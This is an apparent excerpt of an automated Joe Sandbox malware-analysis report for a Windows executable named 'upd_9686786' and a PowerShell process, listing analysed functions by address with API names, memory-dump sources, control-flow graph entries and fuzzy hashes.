                                                                                                                    • Opcode Fuzzy Hash: 361358741b24178b0fa74cdce2c07cab7a2c23279fe57aa56eac6bc2aae8d422
                                                                                                                    • Instruction Fuzzy Hash: 62314B76F04B11CEF700DBB5E8817AD7772A70874CF90406ACE0C67B98CE78A9518768
                                                                                                                    Function 00007FF76E6537D0 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 256 7ff76e6537d0-7ff76e653ad7 ReadFile 258 7ff76e653ad9 256->258 259 7ff76e653adf-7ff76e653b30 256->259 258->259 260 7ff76e653b64-7ff76e653b65 259->260 261 7ff76e653b32-7ff76e653b5e 259->261 261->260
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: 00c90bc5f8544e46d9e3aab6e9ad6653e89a0406caa48d4fff5ae3471c0ed56e
                                                                                                                    • Instruction ID: 41e7b61bd8cc3d7e97325da8257dd238acf7ddc9be6c292221554f441d7689d0
                                                                                                                    • Opcode Fuzzy Hash: 00c90bc5f8544e46d9e3aab6e9ad6653e89a0406caa48d4fff5ae3471c0ed56e
                                                                                                                    • Instruction Fuzzy Hash: BB217F76B04A42CEF714CF65DC447A97372E748B98F5081A5DE4DA7B8CDA3899408B28
                                                                                                                    Function 00007FF76E655D77 Relevance: 1.5, APIs: 1, Instructions: 16processCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 262 7ff76e655d77-7ff76e655dd2 CreateProcessA
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: 8e1d515f989e4e1815a9006ba4d20c998d1b83e19281eeaa243eb79deec221df
                                                                                                                    • Instruction ID: 23d0a5cc21a98f2970485769ca36005a01e1ac803d62f1b2c0a49c968afb4293
                                                                                                                    • Opcode Fuzzy Hash: 8e1d515f989e4e1815a9006ba4d20c998d1b83e19281eeaa243eb79deec221df
                                                                                                                    • Instruction Fuzzy Hash: 36E0ED72324B5086E7208B00F89474BB7B5F784788F500125EA8D07BA8DF3EC2448B50
                                                                                                                    Function 00007FF76E653428 Relevance: 1.4, APIs: 1, Instructions: 119COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2803490479-0
                                                                                                                    • Opcode ID: f37c09c3e7aa3ebea8f22872309fc393a3fbbaf2681fade2672b93c1bf96486d
                                                                                                                    • Instruction ID: abda611bb488f70b94b822e26f05d8e414ea0318aee8a2b3aa85c760167b1884
                                                                                                                    • Opcode Fuzzy Hash: f37c09c3e7aa3ebea8f22872309fc393a3fbbaf2681fade2672b93c1bf96486d
                                                                                                                    • Instruction Fuzzy Hash: 3D514876F04A11CEF714DBB1D854BEC77B2A744748F4080BADE4DA7B88CE38A9518B24

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFC94BC9BD9 Relevance: .8, Instructions: 791COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.30016287081.00007FFC94BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94BC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffc94bc0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d16fbdb827ede69bb0569750c323ac005ea269f05b4fac26da9e44309be2bd68
                                                                                                                    • Instruction ID: a4b8253ceef42945f2c022ff31cd9bb71a235a421133c220ff7fc7156792d81f
                                                                                                                    • Opcode Fuzzy Hash: d16fbdb827ede69bb0569750c323ac005ea269f05b4fac26da9e44309be2bd68
                                                                                                                    • Instruction Fuzzy Hash: 7142D45290EEDA4FFB66C26C1C95238BFA1EB52211B5841FBC08C9B0DBF9159905C3D7
                                                                                                                    Function 00007FFC94C98618 Relevance: .3, Instructions: 335COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.30017398046.00007FFC94C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94C90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffc94c90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1eba4140a855cf991192c76f5798c634af0a9878be02d0ce346dd161b8f19935
                                                                                                                    • Instruction ID: 1a1036d9e94859ff56acd9e26c28a8dba6cec42b7d55eafc88044a2ba6436a8b
                                                                                                                    • Opcode Fuzzy Hash: 1eba4140a855cf991192c76f5798c634af0a9878be02d0ce346dd161b8f19935
                                                                                                                    • Instruction Fuzzy Hash: E7B12862D1DADA5FEB69E62848A51B8BAE1EF55300F1800BFD04E971C3ED296C05C336
                                                                                                                    Function 00007FFC94BC98B4 Relevance: .2, Instructions: 247COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.30016287081.00007FFC94BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94BC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffc94bc0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f4760ce54e013e32dca6d75ad1f185c016f37aaf650b9df587cbfce3281a5295
                                                                                                                    • Instruction ID: 7607e4b145a454b3fd4808f7fe038e8b5325e61bf60ce4742da2be1a805394f8
                                                                                                                    • Opcode Fuzzy Hash: f4760ce54e013e32dca6d75ad1f185c016f37aaf650b9df587cbfce3281a5295
                                                                                                                    • Instruction Fuzzy Hash: 9081E23090DA6D8FEBA5DB6888957E9BBB0EF55300F0080BBC04DD7193EE345985CBA1
                                                                                                                    Function 00007FFC94BC9942 Relevance: .2, Instructions: 226COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.30016287081.00007FFC94BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94BC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffc94bc0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d4da1e4af478a04feac46d9e2c59252026fd3dabb0baca998bfa1d8b645dc26a
                                                                                                                    • Instruction ID: ce318bef97c079604fd3299d0d0297ca391cc5178b267199fded07b2a6a32c9c
                                                                                                                    • Opcode Fuzzy Hash: d4da1e4af478a04feac46d9e2c59252026fd3dabb0baca998bfa1d8b645dc26a
                                                                                                                    • Instruction Fuzzy Hash: 4E71A53190DA6C8FEBA9EB68C8957E9BBF0EF55310F0041ABC04DD7192EE345985CB61
                                                                                                                    Function 00007FFC94C98A92 Relevance: .2, Instructions: 163COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.30017398046.00007FFC94C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94C90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffc94c90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d47d08cb1f0156e44985424e17abf84b415e3d824e22cdc3e568cf730b5ce04b
                                                                                                                    • Instruction ID: 27e1d5d8255019b281f217e96ef60e80d16887fd7979e859a42494ff939dc991
                                                                                                                    • Opcode Fuzzy Hash: d47d08cb1f0156e44985424e17abf84b415e3d824e22cdc3e568cf730b5ce04b
                                                                                                                    • Instruction Fuzzy Hash: 4051E47090D7C85FD7669B2898556A57FF0EF87320F0942EFD08AC7193DB685806C7A2
                                                                                                                    Function 00007FFC94C92D02 Relevance: .1, Instructions: 100COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.30017398046.00007FFC94C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94C90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffc94c90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 510908a679afcd122fdfc74bd4f97e6632407d80b911084c7cb16ab90946832b
                                                                                                                    • Instruction ID: df30ddf71de91408caba15110d355f913633e588e524703d7c35400d55e2e142
                                                                                                                    • Opcode Fuzzy Hash: 510908a679afcd122fdfc74bd4f97e6632407d80b911084c7cb16ab90946832b
                                                                                                                    • Instruction Fuzzy Hash: 02310A3390DADA9FEB6ADB6844911B8BBE0EF05210F1C44BFC58DC71D2DA199845C361
                                                                                                                    Function 00007FFC94BC37B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.30016287081.00007FFC94BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC94BC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffc94bc0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                                                                                    • Instruction ID: 2de3ecc8c19eeea5bf697910ce82b1a41f9b8431daba35b9d830be41f60b5090
                                                                                                                    • Opcode Fuzzy Hash: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                                                                                    • Instruction Fuzzy Hash: A101A77010CB0D4FD744EF0CE491AA6B7E0FB85320F10052EE58AC3291D632E882CB42